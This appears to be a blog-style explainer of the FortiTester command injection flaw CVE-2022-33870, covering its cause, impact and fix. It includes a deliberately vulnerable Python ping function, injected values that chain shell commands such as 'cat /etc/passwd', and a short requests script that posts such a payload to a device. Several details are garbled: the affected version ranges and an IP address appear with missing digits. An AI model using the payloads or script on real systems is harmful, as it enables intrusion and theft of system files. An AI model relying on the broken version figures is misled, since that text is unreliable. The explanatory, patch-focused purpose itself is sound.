CVE-2022-33870 - Command Injection Vulnerability in FortiTester (How Attackers Abuse Simple Mistakes)

Discovered: 2022  
Applies to: Fortinet FortiTester (versions 3..-3.9.1, 4..-4.2., 7..-7.1.)  
Vulnerability type: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')  
CWE Reference: CWE-78  
Official Advisory: Fortinet PSIRT Advisory

What Is CVE-2022-33870?

A programming bug in Fortinet's FortiTester product let attackers run system commands on the device. That’s as bad as it sounds: attackers could, for example, create new users, open backdoors, or even cripple whole systems—all by misusing arguments in the web management interface.

The key reason? FortiTester didn’t properly clean (or “neutralize”) user-supplied information before sending it to the operating system’s command line. This is a textbook case of a *command injection* bug.

How Does The Exploit Work?

Whenever software takes user input and passes it directly to the system shell (like /bin/sh), it’s super important to filter out any characters that could change what the command actually does. For example: if you let someone add a ; (semicolon) into a form, the shell interprets that as, "run this next command too!"

In FortiTester versions listed above, an authenticated user could send a web request (with a specially crafted argument—like a command followed by a semicolon and another command) and trick the server into running extra commands.

Let’s look at a *hypothetical* dangerous code pattern in Python (for illustration)

import os

def run_ping(hostname):
    # DANGEROUS: hostname is used directly in the shell command!
    cmd = "ping -c 4 %s" % hostname
    os.system(cmd)

# Malicious user enters: 127...1; uname -a
run_ping("127...1; uname -a")  # Executes ping, then 'uname -a'

If FortiTester’s backend works like this, and someone enters 8.8.8.8; ls /, the device would both ping 8.8.8.8 and then list every file in the root directory—and there would be no security check stopping them.

Pivot deeper: Use FortiTester as a foothold onto other network machines.

Attackers could automate these attacks with simple scripts, for example, using Python's requests module:

import requests

url = 'https://vulnerable-fortitester/device/config/test';
# Update with valid session cookies, headers, etc.

payload = {
    'target': '8.8.8.8; cat /etc/passwd'
}

res = requests.post(url, data=payload, verify=False)
print(res.text)  # May include sensitive file content if exploited!

Requirement: You need to be logged in.

- Attackers with less skill look for default/weak passwords, or unguarded networks.

Fixes and Mitigation

Fortinet has released patches. Upgrade to:

FortiTester 7.1.1 or later

Don't delay!  
See the official Fortinet advisory for the latest details.

References & Further Reading

- Fortinet Security Advisory FG-IR-22-183
- NVD CVE-2022-33870 Details
- NIST CWE-78: OS Command Injection
- OWASP: Command Injection

Conclusion

CVE-2022-33870 is another warning about the risks of trusting user input—especially in security and network appliances. Always sanitize, validate, and, when possible, never pass unchecked data into system commands.

Patching and monitoring are your best defenses. Don’t let a simple bug open the gate to your whole network.

Timeline

Published on: 11/02/2022 12:15:00 UTC
Last modified on: 11/04/2022 13:42:00 UTC